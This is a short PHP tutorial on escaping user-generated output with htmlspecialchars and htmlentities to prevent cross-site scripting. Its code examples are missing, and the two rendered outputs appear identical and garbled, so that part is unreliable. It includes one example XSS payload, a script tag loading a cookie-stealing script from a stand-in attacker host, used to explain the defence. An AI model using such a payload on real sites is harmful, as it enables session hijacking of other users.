What is output escaping and why does it matter?
Any significant PHP application and even the simplest of websites accept input. When we speak of input, we're talking about input that is generated by users or external systems, which is then processed by our website or application. Some of that input might be stored in our database for later retrieval and output. It's when we output user generated input, input that we ourselves did not generate, that we should escape that data when outputting.
An example of input can be a contact form that is filled out by visitors to your website. The input from the contact form is validated and processed. At some future point in time, we might output/display what the user filled in on our contact form. It's at that time that we need to escape the output.
How to escape output in PHP
We can use the htmlspecialchars
function to escape output:
The above output will display as:
Please <em>contact</em> me as §soon§ as possible.
Or we can use the htmlentities
function to escape output:
The above output will display as:
Please <em>contact</em> me as §soon§ as possible.
Escape output
Certain characters have special meaning in HTML, using htmlspecialchars
and htmlentities
will preserve that meaning. htmlentities
will encode all HTML characters, htmlspecialchars
does not. You can see the full PHP documentation on htmlspecialchars and htmlentities for more information.
Output escaping security
Let's take a look at an example of how a Cross Site Scripting (XSS) attack might take place and where output escaping will prevent such an attack:
- Consider an example of a forum where users post comments.
- Comments are viewable by all users on the forum.
- A user with malicious intent posts a comment that includes a script tag:
<script src="http://hackersite.com/cookiehijack.js">
- When any user views the posted comment, their cookie is stolen and sent to the malicious user.
- The malicious user can now impersonate any user who's cookie was stolen
Escaping the output will prevent the malicious script from running! You can find more in on XSS.
When to escape output?
We escape output when the input we receive is from untrusted sources.
Key Takeaways
- PHP makes the functions
htmlspecialchars
and htmlentities
available for output escaping.
- There are various libraries available for HTML sanitization.
- In general we should escape all output received from untrusted sources.